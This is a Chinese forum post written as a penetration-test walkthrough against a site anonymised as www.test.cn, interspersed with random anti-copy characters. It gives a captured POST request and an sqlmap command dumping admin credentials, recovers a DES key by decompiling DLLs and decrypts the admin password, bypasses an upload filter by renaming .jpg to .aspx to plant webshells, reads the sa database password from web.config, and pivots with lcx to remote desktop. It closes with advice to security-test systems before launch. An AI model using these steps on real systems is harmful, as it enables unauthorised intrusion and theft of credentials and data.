|
: O- R( `1 A4 H" Q( W
注:各位同仁,今天晚上主要防止被限号来凑个数字,这篇文章本来是给一个机构做科普的,所以写的有点怎么说,反正土司的人看了会骂哈哈,大家凑合的看,文中哪怕有那么一点半点东西,能给大家带来启发,那么我这个文章就没白发,所以大佬们轻点喷哈哈,嘴下留情哈哈。 1、POST注入猜解网站管理员账号密码 通过awvs扫描发现存在注入,直接在avws下的Scans---target下点击你扫描的过目标如图:' e2 Z* ?4 l. Y$ X6 a a
1 ?) D8 t! u6 O! v* J' N3 K
; F. _* k; Q6 _
 . |' C2 J1 D4 Q5 h5 `
2 }: H- H% ]% _* k
: i% E! u3 m5 U 然后点vulnerabilities,如图:4 L" F0 U3 Z$ X8 L
: C- A. f: y& S
1 P4 t8 e" ?2 _7 F( N2 e  + j" g/ r6 I" L- R# `! z
" P& D, d+ l5 }6 |* d1 v2 H% v5 m6 U. u( b9 n
点SQL injection会看到HTTPS REQUESTS,如图:
' }4 N6 X4 }5 g* F7 }/ s$ c5 z: C
) C2 q& g0 N S u: T _. d5 G/ h+ r' T6 N* D% {$ g* ?
 * M1 p- l% C2 H0 H! [
0 s) r% V! Q, T: U' r* V
3 B- Q! j; S/ T g4 p4 `4 A& ~ 获取到http的数据包,如下: POST /Product/ProductHandler.ashx HTTP/1.1 Host: www.test.cn Cache-Control: no-cache Accept: text/plain, /; q=0.01 Origin: http://www.test.cn User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.16 Safari/537.36 X-Requested-With: XMLHttpRequest Referer: http://www.test.cn/ Accept-Language: en-us,en;q=0.5 X-Scanner: Netsparker Accept-Encoding: gzip, deflate Content-Length: 157 Content-Type: application/x-www-form-urlencoded; charset=UTF-8; d+ n2 L5 {5 ?! e' J
1 u1 ?' P$ u# l0 |" J: ?3 O! n
/ i7 ^ {: c0 H, U: ? Type=GetProductList&pageIndex=3&pageSize=5&productType=*&supplierType=1 把以上post包保存到sqlmap根目录下,保存为1.txt,注入参数提前用awvs已经识别,注入参数是productType,注入命令为: sqlmap.py -r 1.txt --level 5 --risk 3 -p productType --dbms=mssql -D cci -T Zy_user -C u_loginname,u_loginpassword –dump 此sqlmap命令的意思是读取数据库cci下Zy_user表的用户名密码列名,dump就是保存下来的意思,会保存在./sqlmap/output下,以excel表格的格式保存着下载下来的表的内容。 注入用户名密码加密值如图:
6 K% g2 e7 ?7 L7 _
r% K% t1 V/ |& J% v8 f* ?" C
' A, a7 b8 ~& A' Q8 |# K3 p9 k  , r; e# }3 r0 u# B) j5 [9 H- h
) a4 O9 u# q2 X) _1 U, i2 A, }$ r7 X$ A; f/ J+ Z% a& e% C9 E
2、通过对bin目录dll进行反编译解密管理员加密值登录后台 通过前面的sql注入可获取网站后台账号和密码加密值,为了更深入的测试网站后台是否存在其他漏洞,需要黑盒测试模拟黑客攻击进一步测试,故对网站目录bin目录下的dll进行反编译来获取加密密匙,最终成功解密密码。 把bin目录下的dll全部加载到Reflector中,然后通过跟踪常用用户密码相关的类函数,得出如下结果:$ Y, ^4 ?4 s7 M/ }% F# P6 i5 c2 [
" G7 |* x' |) {! i
" _* o0 c) J/ W/ h+ }% Y, X 
2 g7 f3 E* g1 B8 v8 ]% J6 n
6 j) B' Q" c7 D/ u* ^4 F' z9 B# c4 T
, O, m, h. E+ E/ n
[( C2 M/ H. Q( x# k
x' J! f0 g& G% B h4 F" u: X8 @ 得知密钥是fkue且为des加密,接着定位encrypt类函数找出其解密方式如图:) k3 T: E, K) e x( D
6 Y2 e7 r4 }2 E0 i4 u' V3 S1 j! n# s
 5 Z$ c7 P/ j/ v0 t9 ^! \' z7 W
$ u( \1 I. G1 | x8 Z- L9 {- r$ `# [3 g4 ^0 g
解密方式是把fkue使用md5进行加密,然后取32位md5加密值的前8位作为加密密钥,如图:1 e7 g4 v7 L2 y! [2 Y
4 e8 w% G X. c
3 r/ ~ }4 E+ C" L) m9 O' V+ ^( I 
# {, W, U* m2 l4 _5 w% e : T0 S( [/ A& Z2 [# r
+ V: ]# R! x/ ]7 F$ Z6 w& Z
通过在线解密网站解密得知加密密钥就是:1110AF03。 前面sql注入步骤已经成功获取admin的加密值,如图:
% v8 y) r% v% P4 k1 {" [
) W- ^* E! |. y2 s" x+ ?4 L8 C, j) L7 E$ G
 0 N; m$ J& K* Q+ z$ Z9 l! B
; X, ]$ ~* k! P9 e. X+ P* O
- R. k' ^; z- l+ U 解密admin管理员密码如图:3 U& Z& V' w! U( |3 p+ P! [3 {
/ q1 X% b. c9 u/ h x. N
; a8 ]2 n) Q, z 
; K. T1 z- K( u ) K& ?! Y- i. _! C4 U
& d* D# y: p4 J* P* k* O
然后用自己写了个解密工具,解密结果和在线网站一致
- K7 g/ z9 |3 h E" S# ]: J* @
3 x9 `8 P4 |/ j4 R1 }; Q [6 U! ]# Z' w% Q
 - K; N n" E$ q; }: P
7 z- \; ^0 |6 p$ M
6 g3 S3 O: v2 I) K9 V4 \- N9 H
解密后的密码为:123mhg,./,登陆如图:
" n& E5 X+ `9 I. ]( W w . v+ Y& A* X4 N! @5 Z0 W% R
Y# l0 x7 g& f" O, p
 , C7 u0 M. f' @( l+ U* U4 p8 b4 G7 }# e
# s, S. v- B0 |
& F+ U) @, W' M# o
3、后台上传绕过漏洞getwebshell如图: 登陆后台后,在添加信息处,会有上传图片的功能,随后使用burpsuite抓包如下图:" A% e5 \9 ~6 |6 R h1 O
+ p5 [( X7 ?/ J
* N) O' e2 }, X9 D  % j' v) ?$ ?( l. f! m( z( M; V
' r4 L. ~$ I7 w7 L
# j3 H4 L/ r* p% Q" t! s  ; I4 g9 o e9 \' {" e5 y& B
! y$ |+ h6 `+ F; t
/ i. M i" A2 C7 D 绕过上传限制,只需要把包里的filename的1.jpg改为1.aspx,即可成功上传webshell,如下图:9 |: g7 A& J, [* j: [; I# P
) m* Q' F8 K! [* ^
% p4 \, d6 d1 `6 r; p7 S- n% Y" P 
~; J l/ j4 m' I, t4 o
$ a& H8 ^7 m% q0 O! O Z
0 |, w3 {+ K! y" t$ o& m" N$ p 访问webshell如下图:
" T/ ^; `. G% n. T _
& v3 q, X# {. [/ E5 R% w i0 v& X7 D- \ ?; S
 + s+ F3 M( p* A) b
& }+ a% i7 Y% w' p/ n: l7 E% j7 U b6 {
4、前台任意上传漏洞getwebshell 在目标站前台有注册账号功能,注册成功后,同样在上传图片处可直接上传webshell,链接为http://www.test.cn/userRegister.aspx,登录如图:
l5 u6 r0 q: P - K6 B6 t; b7 C# X# `- l! d/ S! y2 L
1 Z, N& b( P) n# C
7 i$ L$ v5 {1 \5 ]. e& p ' f6 {: m( [* I
7 H& W8 J* \3 |% P# V I
在上传证件或者头像的处可直接上传aspx 后缀的webshell,上传成功后,点右键-属性,可查看上传后的webshell路径为:http://www.test.cn/Admin/upload/demo.aspx 然后登录如图:
! y0 S4 H: d, n4 D7 l4 C9 N( ~ & l9 m% z, {% t
' {2 G3 Z7 |3 j3 h9 t2 L2 p5 q1 z% i
 7 Y; s0 y8 z" P" l0 q- g
! H4 M1 H7 q% [' C$ x2 T1 g0 k
6 Y: P1 x& |$ h" z5 ` 通过查看网站路径下的web.config文件得到mssql数据库配置账号为sa的密码并且以windows身份认证配置的系统登录账号密码如图:- p/ l' @3 ~* Q' C9 J7 u6 W2 M
+ j5 t5 H4 P6 v j: W6 S! b5 V i1 r4 X1 Q5 ]# X6 \
 & `3 f9 z4 v7 q, a- v
5 F% o+ S1 P3 N
0 u, y A8 ~7 ]! o/ c% Q 可直接利用mssql sa权限执行系统命令添加管理员账号密码或者直接利用Windows登录密码webshell下利用lcx内网端口转发登陆3389。
7 o& t4 o3 ~# q! ^
7 H4 F1 U% s% F) V0 Z/ M( S7 z/ O( F+ R
5 ]/ k# V- L a; [: [' O* N( o 总结:一套程序不应该只考虑其美观与功能强大,是要在满足安全的前提下再同时满足美观与功能。建议各个单位在系统上线之前,条件允许的情况下,首先进行白盒测试,其次进行黑盒测试,再次进行灰盒测试。如果通过白、黑、灰发现安全问题,那么就要再进行一轮这样的测试,直到系统难以被发现安全问题,然后再进行上线。特别是一些政府、企事业单位,数据面涉及基础人口等敏感数据,一旦遭到黑客攻击被泄露,给国家带来的损失是无法挽回的。好了以上就是今天分享的渗透内容,谢谢大家的收看! B0 C j3 `2 g, d8 E
- \. ^; D' ~/ q
3 p$ x& b6 i) b
3 a0 K0 ]' q6 C7 `7 _
/ C6 o* N0 X X7 ]' w0 l4 P | 
发表于 2023-11-28 20:23:22
收藏
支持
反对